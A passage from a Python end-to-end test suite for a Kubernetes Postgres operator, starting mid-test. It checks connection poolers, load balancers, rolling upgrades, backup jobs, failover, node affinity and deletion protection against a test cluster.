"connection-pooler=acid-minimal-cluster-pooler-repl"),
2, "Pooler replica pods not found")
self.eventuallyEqual(lambda: k8s.count_services_with_label(
'application=db-connection-pooler,cluster-name=acid-minimal-cluster'),
1, "No pooler service found")
self.eventuallyEqual(lambda: k8s.count_secrets_with_label('application=db-connection-pooler,cluster-name=acid-minimal-cluster'),
1, "Secret not created")
# Turn off only replica connection pooler
k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'enableConnectionPooler': True,
'enableReplicaConnectionPooler': False,
}
})
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"},
"Operator does not get in sync")
self.eventuallyEqual(lambda: k8s.get_deployment_replica_count(), 2,
"Deployment replicas is 2 default")
self.eventuallyEqual(lambda: k8s.count_running_pods("connection-pooler=acid-minimal-cluster-pooler"),
2, "Master pooler pods not found")
self.eventuallyEqual(lambda: k8s.count_running_pods("connection-pooler=acid-minimal-cluster-pooler-repl"),
0, "Pooler replica pods not deleted")
self.eventuallyEqual(lambda: k8s.count_services_with_label('application=db-connection-pooler,cluster-name=acid-minimal-cluster'),
1, "No pooler service found")
self.eventuallyEqual(lambda: k8s.count_secrets_with_label('application=db-connection-pooler,cluster-name=acid-minimal-cluster'),
1, "Secret not created")
# scale up connection pooler deployment
k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'connectionPooler': {
'numberOfInstances': 3,
},
}
})
self.eventuallyEqual(lambda: k8s.get_deployment_replica_count(), 3,
"Deployment replicas is scaled to 3")
self.eventuallyEqual(lambda: k8s.count_running_pods("connection-pooler=acid-minimal-cluster-pooler"),
3, "Scale up of pooler pods does not work")
# turn it off, keeping config should be overwritten by false
k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'enableConnectionPooler': False,
'enableReplicaConnectionPooler': False,
}
})
self.eventuallyEqual(lambda: k8s.count_running_pods("connection-pooler=acid-minimal-cluster-pooler"),
0, "Pooler pods not scaled down")
self.eventuallyEqual(lambda: k8s.count_services_with_label('application=db-connection-pooler,cluster-name=acid-minimal-cluster'),
0, "Pooler service not removed")
self.eventuallyEqual(lambda: k8s.count_secrets_with_label('application=spilo,cluster-name=acid-minimal-cluster'),
4, "Secrets not deleted")
# Verify that all the databases have pooler schema installed.
# Do this via psql, since otherwise we need to deal with
# credentials.
dbList = []
leader = k8s.get_cluster_leader_pod('acid-minimal-cluster')
dbListQuery = "select datname from pg_database"
schemasQuery = """
select schema_name
from information_schema.schemata
where schema_name = 'pooler'
"""
exec_query = r"psql -tAq -c \"{}\" -d {}"
if leader:
try:
q = exec_query.format(dbListQuery, "postgres")
q = "su postgres -c \"{}\"".format(q)
print('Get databases: {}'.format(q))
result = k8s.exec_with_kubectl(leader.metadata.name, q)
dbList = clean_list(result.stdout.split(b'\n'))
print('dbList: {}, stdout: {}, stderr {}'.format(
dbList, result.stdout, result.stderr
))
except Exception as ex:
print('Could not get databases: {}'.format(ex))
print('Stdout: {}'.format(result.stdout))
print('Stderr: {}'.format(result.stderr))
for db in dbList:
if db in ('template0', 'template1'):
continue
schemas = []
try:
q = exec_query.format(schemasQuery, db)
q = "su postgres -c \"{}\"".format(q)
print('Get schemas: {}'.format(q))
result = k8s.exec_with_kubectl(leader.metadata.name, q)
schemas = clean_list(result.stdout.split(b'\n'))
print('schemas: {}, stdout: {}, stderr {}'.format(
schemas, result.stdout, result.stderr
))
except Exception as ex:
print('Could not get databases: {}'.format(ex))
print('Stdout: {}'.format(result.stdout))
print('Stderr: {}'.format(result.stderr))
self.assertNotEqual(len(schemas), 0)
else:
print('Could not find leader pod')
# remove config section to make test work next time
k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'connectionPooler': None,
'EnableReplicaConnectionPooler': False,
}
})
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_enable_load_balancer(self):
'''
Test if services are updated when enabling/disabling load balancers in Postgres manifest
'''
k8s = self.k8s
cluster_label = 'application=spilo,cluster-name=acid-minimal-cluster,spilo-role={}'
self.eventuallyEqual(lambda: k8s.get_service_type(cluster_label.format("master")),
'ClusterIP',
"Expected ClusterIP type initially, found {}")
try:
# enable load balancer services
pg_patch_enable_lbs = {
"spec": {
"enableMasterLoadBalancer": True,
"enableReplicaLoadBalancer": True
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_patch_enable_lbs)
self.eventuallyEqual(lambda: k8s.get_service_type(cluster_label.format("master")),
'LoadBalancer',
"Expected LoadBalancer service type for master, found {}")
self.eventuallyEqual(lambda: k8s.get_service_type(cluster_label.format("replica")),
'LoadBalancer',
"Expected LoadBalancer service type for master, found {}")
# disable load balancer services again
pg_patch_disable_lbs = {
"spec": {
"enableMasterLoadBalancer": False,
"enableReplicaLoadBalancer": False
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_patch_disable_lbs)
self.eventuallyEqual(lambda: k8s.get_service_type(cluster_label.format("master")),
'ClusterIP',
"Expected LoadBalancer service type for master, found {}")
self.eventuallyEqual(lambda: k8s.get_service_type(cluster_label.format("replica")),
'ClusterIP',
"Expected LoadBalancer service type for master, found {}")
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_infrastructure_roles(self):
'''
Test using external secrets for infrastructure roles
'''
k8s = self.k8s
# update infrastructure roles description
secret_name = "postgresql-infrastructure-roles"
roles = "secretname: postgresql-infrastructure-roles-new, userkey: user,"\
"rolekey: memberof, passwordkey: password, defaultrolevalue: robot_zmon"
patch_infrastructure_roles = {
"data": {
"infrastructure_roles_secret_name": secret_name,
"infrastructure_roles_secrets": roles,
},
}
k8s.update_config(patch_infrastructure_roles)
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"},
"Operator does not get in sync")
try:
# check that new roles are represented in the config by requesting the
# operator configuration via API
def verify_role():
try:
operator_pod = k8s.get_operator_pod()
get_config_cmd = "wget --quiet -O - localhost:8080/config"
result = k8s.exec_with_kubectl(operator_pod.metadata.name,
get_config_cmd)
try:
roles_dict = (json.loads(result.stdout)
.get("controller", {})
.get("InfrastructureRoles"))
except:
return False
if "robot_zmon_acid_monitoring_new" in roles_dict:
role = roles_dict["robot_zmon_acid_monitoring_new"]
role.pop("Password", None)
self.assertDictEqual(role, {
"Name": "robot_zmon_acid_monitoring_new",
"Flags": None,
"MemberOf": ["robot_zmon"],
"Parameters": None,
"AdminRole": "",
"Origin": 2,
})
return True
except:
pass
return False
self.eventuallyTrue(verify_role, "infrastructure role setup is not loaded")
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_lazy_spilo_upgrade(self):
'''
Test lazy upgrade for the Spilo image: operator changes a stateful set
but lets pods run with the old image until they are recreated for
reasons other than operator's activity. That works because the operator
configures stateful sets to use "onDelete" pod update policy.
The test covers:
1) enabling lazy upgrade in existing operator deployment
2) forcing the normal rolling upgrade by changing the operator
configmap and restarting its pod
'''
k8s = self.k8s
pod0 = 'acid-minimal-cluster-0'
pod1 = 'acid-minimal-cluster-1'
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2,
"No 2 pods running")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members(pod0)),
2, "Postgres status did not enter running")
patch_lazy_spilo_upgrade = {
"data": {
"docker_image": SPILO_CURRENT,
"enable_lazy_spilo_upgrade": "false"
}
}
k8s.update_config(patch_lazy_spilo_upgrade,
step="Init baseline image version")
self.eventuallyEqual(lambda: k8s.get_statefulset_image(), SPILO_CURRENT,
"Statefulset not updated initially")
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2,
"No 2 pods running")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members(pod0)),
2, "Postgres status did not enter running")
self.eventuallyEqual(lambda: k8s.get_effective_pod_image(pod0),
SPILO_CURRENT, "Rolling upgrade was not executed")
self.eventuallyEqual(lambda: k8s.get_effective_pod_image(pod1),
SPILO_CURRENT, "Rolling upgrade was not executed")
# update docker image in config and enable the lazy upgrade
conf_image = SPILO_LAZY
patch_lazy_spilo_upgrade = {
"data": {
"docker_image": conf_image,
"enable_lazy_spilo_upgrade": "true"
}
}
k8s.update_config(patch_lazy_spilo_upgrade,
step="patch image and lazy upgrade")
self.eventuallyEqual(lambda: k8s.get_statefulset_image(), conf_image,
"Statefulset not updated to next Docker image")
try:
# restart the pod to get a container with the new image
k8s.api.core_v1.delete_namespaced_pod(pod0, 'default')
# verify only pod-0 which was deleted got new image from statefulset
self.eventuallyEqual(lambda: k8s.get_effective_pod_image(pod0),
conf_image, "Delete pod-0 did not get new spilo image")
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2,
"No two pods running after lazy rolling upgrade")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members(pod0)),
2, "Postgres status did not enter running")
self.assertNotEqual(lambda: k8s.get_effective_pod_image(pod1),
SPILO_CURRENT,
"pod-1 should not have change Docker image to {}".format(SPILO_CURRENT))
# clean up
unpatch_lazy_spilo_upgrade = {
"data": {
"enable_lazy_spilo_upgrade": "false",
}
}
k8s.update_config(unpatch_lazy_spilo_upgrade, step="patch lazy upgrade")
# at this point operator will complete the normal rolling upgrade
# so we additionally test if disabling the lazy upgrade - forcing the normal rolling upgrade - works
self.eventuallyEqual(lambda: k8s.get_effective_pod_image(pod0),
conf_image, "Rolling upgrade was not executed",
50, 3)
self.eventuallyEqual(lambda: k8s.get_effective_pod_image(pod1),
conf_image, "Rolling upgrade was not executed",
50, 3)
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members(pod0)),
2, "Postgres status did not enter running")
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_logical_backup_cron_job(self):
'''
Ensure we can (a) create the cron job at user request for a specific PG cluster
(b) update the cluster-wide image for the logical backup pod
(c) delete the job at user request
Limitations:
(a) Does not run the actual batch job because there is no S3 mock to upload backups to
(b) Assumes 'acid-minimal-cluster' exists as defined in setUp
'''
k8s = self.k8s
# create the cron job
schedule = "7 7 7 7 *"
pg_patch_enable_backup = {
"spec": {
"enableLogicalBackup": True,
"logicalBackupSchedule": schedule
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_patch_enable_backup)
try:
self.eventuallyEqual(lambda: len(k8s.get_logical_backup_job().items), 1, "failed to create logical backup job")
job = k8s.get_logical_backup_job().items[0]
self.assertEqual(job.metadata.name, "logical-backup-acid-minimal-cluster",
"Expected job name {}, found {}"
.format("logical-backup-acid-minimal-cluster", job.metadata.name))
self.assertEqual(job.spec.schedule, schedule,
"Expected {} schedule, found {}"
.format(schedule, job.spec.schedule))
# update the cluster-wide image of the logical backup pod
image = "test-image-name"
patch_logical_backup_image = {
"data": {
"logical_backup_docker_image": image,
}
}
k8s.update_config(patch_logical_backup_image, step="patch logical backup image")
def get_docker_image():
jobs = k8s.get_logical_backup_job().items
return jobs[0].spec.job_template.spec.template.spec.containers[0].image
self.eventuallyEqual(get_docker_image, image,
"Expected job image {}, found {}".format(image, "{}"))
# delete the logical backup cron job
pg_patch_disable_backup = {
"spec": {
"enableLogicalBackup": False,
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_patch_disable_backup)
self.eventuallyEqual(lambda: len(k8s.get_logical_backup_job().items), 0, "failed to delete logical backup job")
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
# ensure cluster is healthy after tests
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members("acid-minimal-cluster-0")), 2, "Postgres status did not enter running")
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_min_resource_limits(self):
'''
Lower resource limits below configured minimum and let operator fix it
'''
k8s = self.k8s
# self.eventuallyEqual(lambda: k8s.pg_get_status(), "Running", "Cluster not healthy at start")
# configure minimum boundaries for CPU and memory limits
minCPULimit = '503m'
minMemoryLimit = '502Mi'
patch_min_resource_limits = {
"data": {
"min_cpu_limit": minCPULimit,
"min_memory_limit": minMemoryLimit
}
}
# lower resource limits below minimum
pg_patch_resources = {
"spec": {
"resources": {
"requests": {
"cpu": "10m",
"memory": "50Mi"
},
"limits": {
"cpu": "200m",
"memory": "200Mi"
}
}
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_patch_resources)
k8s.patch_statefulset({"metadata": {"annotations": {"zalando-postgres-operator-rolling-update-required": "False"}}})
k8s.update_config(patch_min_resource_limits, "Minimum resource test")
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2, "No two pods running after lazy rolling upgrade")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members()), 2, "Postgres status did not enter running")
def verify_pod_limits():
pods = k8s.api.core_v1.list_namespaced_pod('default', label_selector="cluster-name=acid-minimal-cluster,application=spilo").items
if len(pods) < 2:
return False
r = pods[0].spec.containers[0].resources.limits['memory'] == minMemoryLimit
r = r and pods[0].spec.containers[0].resources.limits['cpu'] == minCPULimit
r = r and pods[1].spec.containers[0].resources.limits['memory'] == minMemoryLimit
r = r and pods[1].spec.containers[0].resources.limits['cpu'] == minCPULimit
return r
self.eventuallyTrue(verify_pod_limits, "Pod limits were not adjusted")
@classmethod
def setUp(cls):
# cls.k8s.update_config({}, step="Setup")
cls.k8s.patch_statefulset({"meta": {"annotations": {"zalando-postgres-operator-rolling-update-required": False}}})
pass
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_multi_namespace_support(self):
'''
Create a customized Postgres cluster in a non-default namespace.
'''
k8s = self.k8s
with open("manifests/complete-postgres-manifest.yaml", 'r+') as f:
pg_manifest = yaml.safe_load(f)
pg_manifest["metadata"]["namespace"] = self.test_namespace
yaml.dump(pg_manifest, f, Dumper=yaml.Dumper)
try:
k8s.create_with_kubectl("manifests/complete-postgres-manifest.yaml")
k8s.wait_for_pod_start("spilo-role=master", self.test_namespace)
self.assert_master_is_unique(self.test_namespace, "acid-test-cluster")
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
finally:
# delete the new cluster so that the k8s_api.get_operator_state works correctly in subsequent tests
# ideally we should delete the 'test' namespace here but
# the pods inside the namespace get stuck in the Terminating state, making the test time out
k8s.api.custom_objects_api.delete_namespaced_custom_object(
"acid.zalan.do", "v1", self.test_namespace, "postgresqls", "acid-test-cluster")
time.sleep(5)
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_zz_node_readiness_label(self):
'''
Remove node readiness label from master node. This must cause a failover.
'''
k8s = self.k8s
cluster_label = 'application=spilo,cluster-name=acid-minimal-cluster'
readiness_label = 'lifecycle-status'
readiness_value = 'ready'
try:
# get nodes of master and replica(s) (expected target of new master)
current_master_node, current_replica_nodes = k8s.get_pg_nodes(cluster_label)
num_replicas = len(current_replica_nodes)
failover_targets = self.get_failover_targets(current_master_node, current_replica_nodes)
# add node_readiness_label to potential failover nodes
patch_readiness_label = {
"metadata": {
"labels": {
readiness_label: readiness_value
}
}
}
self.assertTrue(len(failover_targets) > 0, "No failover targets available")
for failover_target in failover_targets:
k8s.api.core_v1.patch_node(failover_target, patch_readiness_label)
# define node_readiness_label in config map which should trigger a failover of the master
patch_readiness_label_config = {
"data": {
"node_readiness_label": readiness_label + ':' + readiness_value,
}
}
k8s.update_config(patch_readiness_label_config, "setting readiness label")
new_master_node, new_replica_nodes = self.assert_failover(
current_master_node, num_replicas, failover_targets, cluster_label)
# patch also node where master ran before
k8s.api.core_v1.patch_node(current_master_node, patch_readiness_label)
# toggle pod anti affinity to move replica away from master node
self.eventuallyTrue(lambda: self.assert_distributed_pods(new_master_node, new_replica_nodes, cluster_label), "Pods are redistributed")
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_scaling(self):
'''
Scale up from 2 to 3 and back to 2 pods by updating the Postgres manifest at runtime.
'''
k8s = self.k8s
pod = "acid-minimal-cluster-0"
k8s.scale_cluster(3)
self.eventuallyEqual(lambda: k8s.count_running_pods(), 3, "Scale up to 3 failed")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members(pod)), 3, "Not all 3 nodes healthy")
k8s.scale_cluster(2)
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2, "Scale down to 2 failed")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members(pod)), 2, "Not all members 2 healthy")
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_service_annotations(self):
'''
Create a Postgres cluster with service annotations and check them.
'''
k8s = self.k8s
patch_custom_service_annotations = {
"data": {
"custom_service_annotations": "foo:bar",
}
}
k8s.update_config(patch_custom_service_annotations)
pg_patch_custom_annotations = {
"spec": {
"serviceAnnotations": {
"annotation.key": "value",
"alice": "bob",
}
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_patch_custom_annotations)
annotations = {
"annotation.key": "value",
"foo": "bar",
"alice": "bob"
}
self.eventuallyTrue(lambda: k8s.check_service_annotations("cluster-name=acid-minimal-cluster,spilo-role=master", annotations), "Wrong annotations")
self.eventuallyTrue(lambda: k8s.check_service_annotations("cluster-name=acid-minimal-cluster,spilo-role=replica", annotations), "Wrong annotations")
# clean up
unpatch_custom_service_annotations = {
"data": {
"custom_service_annotations": "",
}
}
k8s.update_config(unpatch_custom_service_annotations)
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_statefulset_annotation_propagation(self):
'''
Inject annotation to Postgresql CRD and check it's propagation to stateful set
'''
k8s = self.k8s
cluster_label = 'application=spilo,cluster-name=acid-minimal-cluster'
patch_sset_propagate_annotations = {
"data": {
"downscaler_annotations": "deployment-time,downscaler/*",
"inherited_annotations": "owned-by",
}
}
k8s.update_config(patch_sset_propagate_annotations)
pg_crd_annotations = {
"metadata": {
"annotations": {
"deployment-time": "2020-04-30 12:00:00",
"downscaler/downtime_replicas": "0",
"owned-by": "acid",
},
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_crd_annotations)
annotations = {
"deployment-time": "2020-04-30 12:00:00",
"downscaler/downtime_replicas": "0",
"owned-by": "acid",
}
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
self.eventuallyTrue(lambda: k8s.check_statefulset_annotations(cluster_label, annotations), "Annotations missing")
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
@unittest.skip("Skipping this test until fixed")
def test_zzz_taint_based_eviction(self):
'''
Add taint "postgres=:NoExecute" to node with master. This must cause a failover.
'''
k8s = self.k8s
cluster_label = 'application=spilo,cluster-name=acid-minimal-cluster'
# verify we are in good state from potential previous tests
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2, "No 2 pods running")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members("acid-minimal-cluster-0")), 2, "Postgres status did not enter running")
# get nodes of master and replica(s) (expected target of new master)
master_nodes, replica_nodes = k8s.get_cluster_nodes()
self.assertNotEqual(master_nodes, [])
self.assertNotEqual(replica_nodes, [])
# taint node with postgres=:NoExecute to force failover
body = {
"spec": {
"taints": [
{
"effect": "NoExecute",
"key": "postgres"
}
]
}
}
k8s.api.core_v1.patch_node(master_nodes[0], body)
self.eventuallyTrue(lambda: k8s.get_cluster_nodes()[0], replica_nodes)
self.assertNotEqual(lambda: k8s.get_cluster_nodes()[0], master_nodes)
# add toleration to pods
patch_toleration_config = {
"data": {
"toleration": "key:postgres,operator:Exists,effect:NoExecute"
}
}
k8s.update_config(patch_toleration_config, step="allow tainted nodes")
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2, "No 2 pods running")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members("acid-minimal-cluster-0")), 2, "Postgres status did not enter running")
# toggle pod anti affinity to move replica away from master node
nm, new_replica_nodes = k8s.get_cluster_nodes()
new_master_node = nm[0]
self.assert_distributed_pods(new_master_node, new_replica_nodes, cluster_label)
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_infrastructure_roles(self):
'''
Test using external secrets for infrastructure roles
'''
k8s = self.k8s
# update infrastructure roles description
secret_name = "postgresql-infrastructure-roles"
roles = "secretname: postgresql-infrastructure-roles-new, userkey: user, rolekey: memberof, passwordkey: password, defaultrolevalue: robot_zmon"
patch_infrastructure_roles = {
"data": {
"infrastructure_roles_secret_name": secret_name,
"infrastructure_roles_secrets": roles,
},
}
k8s.update_config(patch_infrastructure_roles)
# wait a little before proceeding
time.sleep(30)
# check that new roles are represented in the config by requesting the
# operator configuration via API
operator_pod = k8s.get_operator_pod()
get_config_cmd = "wget --quiet -O - localhost:8080/config"
result = k8s.exec_with_kubectl(operator_pod.metadata.name, get_config_cmd)
roles_dict = (json.loads(result.stdout)
.get("controller", {})
.get("InfrastructureRoles"))
self.assertTrue("robot_zmon_acid_monitoring_new" in roles_dict)
role = roles_dict["robot_zmon_acid_monitoring_new"]
role.pop("Password", None)
self.assertDictEqual(role, {
"Name": "robot_zmon_acid_monitoring_new",
"Flags": None,
"MemberOf": ["robot_zmon"],
"Parameters": None,
"AdminRole": "",
"Origin": 2,
})
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_node_affinity(self):
'''
Add label to a node and update postgres cluster spec to deploy only on a node with that label
'''
k8s = self.k8s
cluster_label = 'application=spilo,cluster-name=acid-minimal-cluster'
# verify we are in good state from potential previous tests
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2, "No 2 pods running")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members("acid-minimal-cluster-0")), 2, "Postgres status did not enter running")
self.eventuallyEqual(lambda: self.k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
# get nodes of master and replica(s)
master_node, replica_nodes = k8s.get_pg_nodes(cluster_label)
self.assertNotEqual(master_node, [])
self.assertNotEqual(replica_nodes, [])
# label node with environment=postgres
node_label_body = {
"metadata": {
"labels": {
"node-affinity-test": "postgres"
}
}
}
try:
# patch current master node with the label
print('patching master node: {}'.format(master_node))
k8s.api.core_v1.patch_node(master_node, node_label_body)
# add node affinity to cluster
patch_node_affinity_config = {
"spec": {
"nodeAffinity" : {
"requiredDuringSchedulingIgnoredDuringExecution": {
"nodeSelectorTerms": [
{
"matchExpressions": [
{
"key": "node-affinity-test",
"operator": "In",
"values": [
"postgres"
]
}
]
}
]
}
}
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
group="acid.zalan.do",
version="v1",
namespace="default",
plural="postgresqls",
name="acid-minimal-cluster",
body=patch_node_affinity_config)
self.eventuallyEqual(lambda: self.k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
# node affinity change should cause replica to relocate from replica node to master node due to node affinity requirement
k8s.wait_for_pod_failover(master_node, 'spilo-role=replica,' + cluster_label)
k8s.wait_for_pod_start('spilo-role=replica,' + cluster_label)
podsList = k8s.api.core_v1.list_namespaced_pod('default', label_selector=cluster_label)
for pod in podsList.items:
if pod.metadata.labels.get('spilo-role') == 'replica':
self.assertEqual(master_node, pod.spec.node_name,
"Sanity check: expected replica to relocate to master node {}, but found on {}".format(master_node, pod.spec.node_name))
# check that pod has correct node affinity
key = pod.spec.affinity.node_affinity.required_during_scheduling_ignored_during_execution.node_selector_terms[0].match_expressions[0].key
value = pod.spec.affinity.node_affinity.required_during_scheduling_ignored_during_execution.node_selector_terms[0].match_expressions[0].values[0]
self.assertEqual("node-affinity-test", key,
"Sanity check: expect node selector key to be equal to 'node-affinity-test' but got {}".format(key))
self.assertEqual("postgres", value,
"Sanity check: expect node selector value to be equal to 'postgres' but got {}".format(value))
patch_node_remove_affinity_config = {
"spec": {
"nodeAffinity" : None
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
group="acid.zalan.do",
version="v1",
namespace="default",
plural="postgresqls",
name="acid-minimal-cluster",
body=patch_node_remove_affinity_config)
self.eventuallyEqual(lambda: self.k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
# remove node affinity to move replica away from master node
nm, new_replica_nodes = k8s.get_cluster_nodes()
new_master_node = nm[0]
self.assert_distributed_pods(new_master_node, new_replica_nodes, cluster_label)
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_zzzz_cluster_deletion(self):
'''
Test deletion with configured protection
'''
k8s = self.k8s
cluster_label = 'application=spilo,cluster-name=acid-minimal-cluster'
# configure delete protection
patch_delete_annotations = {
"data": {
"delete_annotation_date_key": "delete-date",
"delete_annotation_name_key": "delete-clustername"
}
}
k8s.update_config(patch_delete_annotations)
time.sleep(25)
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
try:
# this delete attempt should be ignored by the operator because the required annotations are missing
k8s.api.custom_objects_api.delete_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster")
time.sleep(15)
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
# check that pods and services are still there
k8s.wait_for_running_pods(cluster_label, 2)
k8s.wait_for_service(cluster_label)
# recreate Postgres cluster resource
k8s.create_with_kubectl("manifests/minimal-postgres-manifest.yaml")
# wait a little before proceeding
time.sleep(10)
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
# add annotations to manifest
delete_date = datetime.today().strftime('%Y-%m-%d')
pg_patch_delete_annotations = {
"metadata": {
"annotations": {
"delete-date": delete_date,
"delete-clustername": "acid-minimal-cluster",
}
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_patch_delete_annotations)
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
# wait a little before proceeding
time.sleep(20)
k8s.wait_for_running_pods(cluster_label, 2)
k8s.wait_for_service(cluster_label)
# now delete process should be triggered
k8s.api.custom_objects_api.delete_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster")
self.eventuallyEqual(lambda: len(k8s.api.custom_objects_api.list_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", label_selector="cluster-name=acid-minimal-cluster")["items"]), 0, "Manifest not deleted")
# check if everything has been deleted
self.eventuallyEqual(lambda: k8s.count_pods_with_label(cluster_label), 0, "Pods not deleted")
self.eventuallyEqual(lambda: k8s.count_services_with_label(cluster_label), 0, "Service not deleted")
self.eventuallyEqual(lambda: k8s.count_endpoints_with_label(cluster_label), 0, "Endpoints not deleted")
self.eventuallyEqual(lambda: k8s.count_statefulsets_with_label(cluster_label), 0, "Statefulset not deleted")
self.eventuallyEqual(lambda: k8s.count_deployments_with_label(cluster_label), 0, "Deployments not deleted")
self.eventuallyEqual(lambda: k8s.count_pdbs_with_label(cluster_label), 0, "Pod disruption budget not deleted")
self.eventuallyEqual(lambda: k8s.count_secrets_with_label(cluster_label), 0, "Secrets not deleted")
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
# reset configmap
patch_delete_annotations = {
"data": {
"delete_annotation_date_key": "",
"delete_annotation_name_key": ""
}
}
k8s.update_config(patch_delete_annotations)
def get_failover_targets(self, master_node, replica_nodes):
'''
If all pods live on the same node, failover will happen to other worker(s)
'''
k8s = self.k8s
k8s_master_exclusion = 'kubernetes.io/hostname!=postgres-operator-e2e-tests-control-plane'
failover_targets = [x for x in replica_nodes if x != master_node]
if len(failover_targets) == 0:
nodes = k8s.api.core_v1.list_node(label_selector=k8s_master_exclusion)
for n in nodes.items:
if n.metadata.name != master_node:
failover_targets.append(n.metadata.name)
return failover_targets
def assert_failover(self, current_master_node, num_replicas, failover_targets, cluster_label):
'''
Check if master is failing over. The replica should move first to be the switchover target
'''
k8s = self.k8s
k8s.wait_for_pod_failover(failover_targets, 'spilo-role=master,' + cluster_label)
k8s.wait_for_pod_start('spilo-role=replica,' + cluster_label)
new_master_node, new_replica_nodes = k8s.get_pg_nodes(cluster_label)
self.assertNotEqual(current_master_node, new_master_node,
"Master on {} did not fail over to one of {}".format(current_master_node, failover_targets))
self.assertEqual(num_replicas, len(new_replica_nodes),
"Expected {} replicas, found {}".format(num_replicas, len(new_replica_nodes)))
self.assert_master_is_unique()
return new_master_node, new_replica_nodes
def assert_master_is_unique(self, namespace='default', clusterName="acid-minimal-cluster"):
'''
Check that there is a single pod in the k8s cluster with the label "spilo-role=master"
To be called manually after operations that affect pods
'''
k8s = self.k8s
labels = 'spilo-role=master,cluster-name=' + clusterName
num_of_master_pods = k8s.count_pods_with_label(labels, namespace)
self.assertEqual(num_of_master_pods, 1, "Expected 1 master pod, found {}".format(num_of_master_pods))
